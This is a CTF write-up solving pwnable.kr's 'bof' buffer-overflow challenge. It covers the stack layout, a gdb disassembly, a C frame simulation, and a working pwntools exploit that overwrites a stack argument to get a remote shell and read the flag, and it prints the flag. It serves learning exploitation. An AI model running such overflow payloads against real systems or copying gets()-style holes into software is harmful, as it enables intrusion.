http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=8591
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ checksec --file=bof
RELRO           STACK CANARY   NX          PIE          RPATH      RUNPATH      Symbols     FORTIFY  Fortified  Fortifiable  FILE
Partial RELRO   Canary found   NX enabled  PIE enabled  No RPATH   No RUNPATH   70 Symbols  No       0          1            bof
checksec reports "Canary found".
I had assumed a canary was more or less in place, so I looked at the source carefully.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme); // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}

int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}
What confused me here was whether the parameter int key sits before or after the return address; I could not recall the exact concept.
(Whenever I forget something like this, going over it again and relearning it seems to be how it sticks.)
In a typical x86-64 build, the first integer argument to func is passed in a register (edi) and, at -O0, spilled into func's own frame, so it is laid out like a local. With higher addresses at the top, the frame looks like this (it matches the addresses the test program below prints, where key is 4 bytes below overflowme):
RET
SFP
overflowme (local)
key (spilled argument)
So on x86-64, key sits below the return address and SFP, and an overflow of overflowme, which runs toward higher addresses, never reaches it.
The bof binary, however, is 32-bit and uses the cdecl convention: main stores 0xdeadbeef on the stack before the call and func reads key from [ebp+0x8], above both the saved ebp and the return address. That is the layout the disassembly below confirms, and it is the only reason the overflow can reach key at all.
To check this, I compiled and ran a small C program.
===============================================
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ cat test.c
#include <stdio.h>

/* Built as a 64-bit binary: key arrives in edi and is spilled into func's frame. */
void func(int key)
{
    char overflowme[32];
    printf("Address of overflowme: %p\n", (void*)overflowme);
    printf("Address of key: %p\n", (void*)&key);
}

int main(void)
{
    func(0xdeadbeef);
    return 0;
}
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ ./test
Address of overflowme: 0x7ffe2575c7c0
Address of key: 0x7ffe2575c7bc
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$
===================================================
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ pwnable$ gdb -q bof
Reading symbols from bof...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x0000068a <+0>: push ebp
0x0000068b <+1>: mov ebp,esp
0x0000068d <+3>: and esp,0xfffffff0
0x00000690 <+6>: sub esp,0x10
0x00000693 <+9>: mov DWORD PTR [esp],0xdeadbeef
0x0000069a <+16>: call 0x62c <func>
0x0000069f <+21>: mov eax,0x0
0x000006a4 <+26>: leave
0x000006a5 <+27>: ret
End of assembler dump.
(gdb) disas func
Dump of assembler code for function func:
0x0000062c <+0>: push ebp
0x0000062d <+1>: mov ebp,esp
0x0000062f <+3>: sub esp,0x48
0x00000632 <+6>: mov eax,gs:0x14
0x00000638 <+12>: mov DWORD PTR [ebp-0xc],eax
0x0000063b <+15>: xor eax,eax
0x0000063d <+17>: mov DWORD PTR [esp],0x78c
0x00000644 <+24>: call 0x645 <func+25>
0x00000649 <+29>: lea eax,[ebp-0x2c]
0x0000064c <+32>: mov DWORD PTR [esp],eax
0x0000064f <+35>: call 0x650 <func+36>
0x00000654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe
0x0000065b <+47>: jne 0x66b <func+63>
0x0000065d <+49>: mov DWORD PTR [esp],0x79b
0x00000664 <+56>: call 0x665 <func+57>
0x00000669 <+61>: jmp 0x677 <func+75>
0x0000066b <+63>: mov DWORD PTR [esp],0x7a3
0x00000672 <+70>: call 0x673 <func+71>
0x00000677 <+75>: mov eax,DWORD PTR [ebp-0xc]
0x0000067a <+78>: xor eax,DWORD PTR gs:0x14
0x00000681 <+85>: je 0x688 <func+92>
0x00000683 <+87>: call 0x684 <func+88>
0x00000688 <+92>: leave
0x00000689 <+93>: ret
End of assembler dump.
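As an added example (not part of the original post or of the challenge's own code), the C program below models func()'s frame using only the offsets visible in the disassembly above, computes the distance from overflowme to key, and replays gets() with a payload. It shows two things the disassembly implies: key at [ebp+0x8] is reachable only because the 32-bit binary passes it on the stack above the saved ebp and return address, and the canary at ebp-0xc is clobbered but irrelevant, because the key comparison at func+40 and the system() call happen before the epilogue's canary check at func+75. The canary, saved ebp and return address values are constructed placeholders; the canary's low byte is zero, as glibc's is, which is why a 32-byte input whose terminating NUL lands on the canary leaves it intact.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame of func() in the 32-bit bof binary, reconstructed from the disassembly
 * (offsets relative to ebp). The 64-bit test.c does not reproduce this: there
 * the first int argument arrives in edi and is spilled below the locals. */
enum {
    OFF_OVERFLOWME = -0x2c, /* lea eax,[ebp-0x2c]; pointer handed to gets()   */
    OFF_CANARY     = -0x0c, /* mov DWORD PTR [ebp-0xc],eax  (eax = gs:0x14)   */
    OFF_SFP        =  0x00, /* saved ebp                                      */
    OFF_RET        =  0x04, /* return address into main                       */
    OFF_KEY        =  0x08  /* cmp DWORD PTR [ebp+0x8],0xcafebabe             */
};

/* Flat model of the frame: index 0 is ebp-0x2c. A little slack is added so the
 * NUL that gets() appends after the input has somewhere to land. */
#define FRAME_BASE 0x2c
#define MODEL_SIZE (FRAME_BASE + OFF_KEY + 4 + 16)

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void     wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* Bytes gets() must write, starting at overflowme, before it reaches key. */
size_t offset_to_key(void)
{
    return (size_t)(OFF_KEY - OFF_OVERFLOWME); /* 0x2c + 4 + 4 = 0x34 */
}

/* Same bytes the pwntools script sends: padding up to key, then the key value
 * in little-endian order (what p32() produces). */
size_t build_payload(uint8_t *out, size_t cap)
{
    size_t pad = offset_to_key();
    if (cap < pad + 4)
        return 0;
    memset(out, 'A', pad);
    wr32(out + pad, 0xcafebabe);
    return pad + 4;
}

struct verdict {
    int      shell;         /* would system("/bin/sh") run?           */
    int      canary_intact; /* would the epilogue's canary check pass? */
    uint32_t key;           /* value func() sees at [ebp+0x8]         */
};

/* Replay gets(overflowme) with the given input, then evaluate func()'s two
 * checks in the order the disassembly performs them. Initial canary, SFP and
 * RET values are constructed placeholders, not taken from a real run. */
struct verdict simulate(const uint8_t *input, size_t len)
{
    uint8_t  frame[MODEL_SIZE];
    uint32_t canary = 0x1b2c3d00; /* constructed; low byte 0x00 like glibc's */
    struct verdict v;

    memset(frame, 0, sizeof frame);
    wr32(frame + FRAME_BASE + OFF_CANARY, canary);
    wr32(frame + FRAME_BASE + OFF_SFP,    0xffffd000); /* constructed */
    wr32(frame + FRAME_BASE + OFF_RET,    0x5655569f); /* constructed */
    wr32(frame + FRAME_BASE + OFF_KEY,    0xdeadbeef); /* what main passes */

    /* gets() has no length limit: copy everything, then the terminating NUL. */
    if (len > sizeof frame - 1)
        len = sizeof frame - 1;
    memcpy(frame + FRAME_BASE + OFF_OVERFLOWME, input, len);
    frame[FRAME_BASE + OFF_OVERFLOWME + len] = '\0';

    /* func+40: key is compared and system() is called BEFORE any canary check. */
    v.key   = rd32(frame + FRAME_BASE + OFF_KEY);
    v.shell = (v.key == 0xcafebabe);
    /* func+75..+87: only evaluated on the way out, after the shell has exited. */
    v.canary_intact = (rd32(frame + FRAME_BASE + OFF_CANARY) == canary);
    return v;
}

int main(void)
{
    uint8_t payload[64];
    size_t  n = build_payload(payload, sizeof payload);
    struct verdict v = simulate(payload, n);
    printf("offset to key: 0x%zx, payload %zu bytes\n", offset_to_key(), n);
    printf("key=0x%08x shell=%d canary_intact=%d\n", v.key, v.shell, v.canary_intact);
    return 0;
}
```

Running it with the page's payload reports key=0xcafebabe and shell=1 with canary_intact=0; feeding it exactly 32 bytes leaves key at 0xdeadbeef and the canary untouched, which is the normal, non-overflowing case.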
Below is the exploit code for bof.
from pwn import *

context.log_level = 'debug'
p = remote('pwnable.kr', 9000)
#p = process('./bof')

# overflowme is at ebp-0x2c; key is the caller-pushed argument at ebp+0x8.
# 0x2c (buffer up to saved ebp) + 4 (saved ebp) + 4 (return address) = 0x34
# bytes of padding, so the next dword lands on key. The canary at ebp-0xc is
# clobbered on the way, but func() compares key and runs system("/bin/sh")
# before the epilogue checks the canary, so __stack_chk_fail never fires.
payload = b'A' * 0x34
payload += p32(0xcafebabe)
p.sendline(payload)
p.interactive()
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ python3 exploit.py
[+] Opening connection to pwnable.kr on port 9000: Done
[DEBUG] Sent 0x39 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000030 41 41 41 41 be ba fe ca 0a │AAAA│····│·│
00000039
[*] Switching to interactive mode
$ ls
[DEBUG] Sent 0x3 bytes:
b'ls\n'
[DEBUG] Received 0x1c bytes:
b'bof\n'
b'bof.c\n'
b'flag\n'
b'log\n'
b'super.pl\n'
bof
bof.c
flag
log
super.pl
$ cat flag
[DEBUG] Sent 0x9 bytes:
b'cat flag\n'
[DEBUG] Received 0x20 bytes:
b'daddy, I just pwned a buFFer :)\n'
daddy, I just pwned a buFFer :)
$
The flag is:
daddy, I just pwned a buFFer :)
Date : 2024/12/25 09:44